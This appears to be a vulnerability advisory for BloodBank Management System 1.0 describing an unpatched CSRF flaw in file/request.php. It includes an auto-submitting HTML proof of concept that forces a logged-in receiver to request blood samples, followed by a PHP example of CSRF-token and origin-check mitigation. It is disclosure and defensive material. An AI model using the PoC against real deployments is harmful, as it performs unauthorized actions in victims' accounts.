## **Affected Version:**
- **BloodBank Management System**: 1.0
## **Vulnerability Information:**
- **Vulnerability Type:** Cross Site Request Forgery (CSRF)
- **Severity:** HIGH
- **Status:** Unpatched
## **Vulnerable Endpoint:**
- **Path:** `file/request.php`
## **Vulnerability Description:**
There is a Cross Site Request Forgery vulnerability on the `/file/request.php` endpoint that allows a remote attacker to initiate a `blood sample` request on behalf of a logged-in `receiver`, drawing from the available blood samples of a selected hospital.
Successful exploitation can lead to **unauthorized actions** on behalf of the victim. The request is triggered when the logged-in victim visits a malicious website hosting the payload.
---
## **Proof of Concept (PoC):**
Below is an example of a **CSRF PoC attack** that initiates a `blood sample` request from a logged-in `receiver`'s account:
```html
<html>
<head>
<title>CSRF PoC</title>
</head>
<body>
<form action="http://localhost.local/bloodbank/file/request.php" method="POST" enctype="application/x-www-form-urlencoded">
<input name="bid" value="16">
<input name="hid" value="3">
<input name="bg" value="B-">
<input name="request" value="Request+Sample">
</form>
<script>
document.querySelector("form").submit();
</script>
</body>
</html>
```
---
## **Impact:**
- **Data Manipulation:** Attackers could modify the content displayed to users.
- **Reputational Damage:** Users may lose trust in the system due to malicious behavior.
---
## **Mitigation Recommendations:**
1. **Use CSRF Tokens:** Implement a mechanism to deter cross-domain requests, i.e. include unpredictable `csrf tokens` in every state-changing form and verify them server-side before acting on the request.
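The following is an added example (not the BloodBank Management System's own code) of the synchronizer-token fix for a state-changing PHP endpoint such as `file/request.php`; the field names `bid`, `hid`, `bg` and `request` come from the PoC above, while the helper names and the `csrf_token` field name are assumptions. With this in place, the PoC form above, which carries no token and is submitted from a foreign origin, is rejected with HTTP 403.

```php
<?php
// Added example, not the project's code: synchronizer-token CSRF protection.
// Mark the session cookie SameSite=Lax (PHP >= 7.3) so browsers already
// withhold it on cross-site POSTs; the token check below is the main control.
session_set_cookie_params(['samesite' => 'Lax', 'httponly' => true]);
session_start();

// Issue one random token per session and embed it in every form posting here.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Accept the POST only if the submitted token matches the session token.
// hash_equals() compares in constant time to avoid leaking the token via timing.
function csrf_verify(array $post): bool {
    $sent = $post['csrf_token'] ?? '';
    $expected = $_SESSION['csrf_token'] ?? '';
    return $expected !== '' && is_string($sent) && hash_equals($expected, $sent);
}

// Defence in depth: require the Origin (or, failing that, Referer) host to be our own.
function same_origin(array $server, string $allowedHost): bool {
    $src = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '';
    return $src !== '' && (string) parse_url($src, PHP_URL_HOST) === $allowedHost;
}

if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['request'])) {
    if (!csrf_verify($_POST) || !same_origin($_SERVER, $_SERVER['HTTP_HOST'] ?? '')) {
        http_response_code(403);
        exit('Rejected: missing/invalid CSRF token or cross-origin request');
    }
    // Original request handling (bid, hid, bg lookup and insert) continues here.
}
?>
<!-- The legitimate form must carry the token as a hidden field. -->
<form action="request.php" method="POST">
  <input type="hidden" name="csrf_token" value="<?= htmlspecialchars(csrf_token()) ?>">
  <input type="hidden" name="bid" value="16">
  <input type="hidden" name="hid" value="3">
  <input type="hidden" name="bg" value="B-">
  <button type="submit" name="request" value="Request Sample">Request Sample</button>
</form>
```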
---